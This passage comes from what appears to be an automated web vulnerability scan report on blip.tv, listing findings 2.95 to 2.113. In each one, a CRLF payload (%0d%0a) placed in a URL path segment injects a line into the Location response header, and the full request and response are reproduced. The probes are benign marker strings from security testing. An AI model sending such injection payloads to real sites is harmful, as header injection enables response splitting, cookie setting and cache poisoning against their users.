<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/1fc66
d6afc4fff45/Armc
...[SNIP]...

2.95. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 70ee7%0d%0aa133d018d57 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/70ee7%0d%0aa133d018d57 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/70ee7
a133d018d57

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:21 GMT
X-Varnish: 1274880934
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/70ee7
a133d018d57"
...[SNIP]...

2.96. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload db778%0d%0ac53aab65b12 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /db778%0d%0ac53aab65b12/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/db778
c53aab65b12
/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 350
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 1324526368
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/db778
c53aab65b12/get/Armch
...[SNIP]...

2.97. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload acb71%0d%0a5a85065288a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/acb71%0d%0a5a85065288a/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/acb71
5a85065288a
/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 2146044616
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/acb71
5a85065288a/Armc
...[SNIP]...

2.98. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload dd8c1%0d%0a6e997ed3acc was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/dd8c1%0d%0a6e997ed3acc HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/dd8c1
6e997ed3acc

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 1324526444
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/dd8c1
6e997ed3acc"
...[SNIP]...

2.99. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5d762%0d%0ad5b2cd9879d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5d762%0d%0ad5b2cd9879d/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/5d762
d5b2cd9879d
/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 350
Date: Thu, 20 Jan 2011 00:38:23 GMT
X-Varnish: 2146045095
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/5d762
d5b2cd9879d/get/Armch
...[SNIP]...

2.100. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e5932%0d%0abe8481e9c38 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/e5932%0d%0abe8481e9c38/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/e5932
be8481e9c38
/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:24 GMT
X-Varnish: 2146045135
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/e5932
be8481e9c38/Armc
...[SNIP]...

2.101. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 86269%0d%0a1601b24ec93 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/86269%0d%0a1601b24ec93 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/86269
1601b24ec93

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:24 GMT
X-Varnish: 344226548
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/86269
1601b24ec93"
...[SNIP]...

2.102. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 76864%0d%0aee373237688 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /76864%0d%0aee373237688/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/76864
ee373237688
/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 366
Date: Thu, 20 Jan 2011 00:38:03 GMT
X-Varnish: 344223896
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/76864
ee373237688/get/Armch
...[SNIP]...

2.103. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e9027%0d%0aae40af891ce was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/e9027%0d%0aae40af891ce/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/e9027
ae40af891ce
/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 367
Date: Thu, 20 Jan 2011 00:38:03 GMT
X-Varnish: 1274878586
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/e9027
ae40af891ce/Armc
...[SNIP]...

2.104. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 99974%0d%0a00d5354d6be was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/99974%0d%0a00d5354d6be HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/99974
00d5354d6be

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:04 GMT
X-Varnish: 1274878615
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/99974
00d5354d6be"
...[SNIP]...

2.105. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f0c72%0d%0a15d58a252b3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f0c72%0d%0a15d58a252b3/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/f0c72
15d58a252b3
/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 351
Date: Thu, 20 Jan 2011 00:38:01 GMT
X-Varnish: 1025263364
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/f0c72
15d58a252b3/get/Armch
...[SNIP]...

2.106. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload eaa8a%0d%0a161c1066545 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/eaa8a%0d%0a161c1066545/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/eaa8a
161c1066545
/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352
Date: Thu, 20 Jan 2011 00:38:01 GMT
X-Varnish: 344223635
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/eaa8a
161c1066545/Armc
...[SNIP]...

2.107. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6c793%0d%0a57e116ecbd8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/6c793%0d%0a57e116ecbd8 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/6c793
57e116ecbd8

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:01 GMT
X-Varnish: 1498213384
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/6c793
57e116ecbd8"
...[SNIP]...

2.108. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow264.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c0c6e%0d%0a5695b90a4f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c0c6e%0d%0a5695b90a4f3/get/Askaninja-AskANinja011811ThatGlow264.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/c0c6e
5695b90a4f3
/get/Askaninja-AskANinja011811ThatGlow264.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:16 GMT
X-Varnish: 1248903625
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c0c6e
5695b90a4f3/get/Askan
...[SNIP]...

2.109. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow264.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 79c8b%0d%0a3360beab2ff was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/79c8b%0d%0a3360beab2ff/Askaninja-AskANinja011811ThatGlow264.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/79c8b
3360beab2ff
/Askaninja-AskANinja011811ThatGlow264.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:16 GMT
X-Varnish: 1324525882
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/79c8b
3360beab2ff/Aska
...[SNIP]...

2.110. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow264.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f97c7%0d%0ac3998e3c9c1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/f97c7%0d%0ac3998e3c9c1 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/f97c7
c3998e3c9c1

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 1248903716
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/f97c7
c3998e3c9c1"
...[SNIP]...

2.111. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow990.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d02bd%0d%0a897d9453cba was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d02bd%0d%0a897d9453cba/get/Askaninja-AskANinja011811ThatGlow990.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/d02bd
897d9453cba
/get/Askaninja-AskANinja011811ThatGlow990.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:16 GMT
X-Varnish: 344225551
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/d02bd
897d9453cba/get/Askan
...[SNIP]...

2.112. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow990.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload feabf%0d%0a25bd50cd6ce was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/feabf%0d%0a25bd50cd6ce/Askaninja-AskANinja011811ThatGlow990.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/feabf
25bd50cd6ce
/Askaninja-AskANinja011811ThatGlow990.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 344225596
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/feabf
25bd50cd6ce/Aska
...[SNIP]...

2.113. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow990.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload dca07%0d%0a649df3a9a60 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/dca07%0d%0a649df3a9a60 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/dca07
649df3a9a60

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 344225641
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/dca07
649df3a9a60"
...[SNIP]...

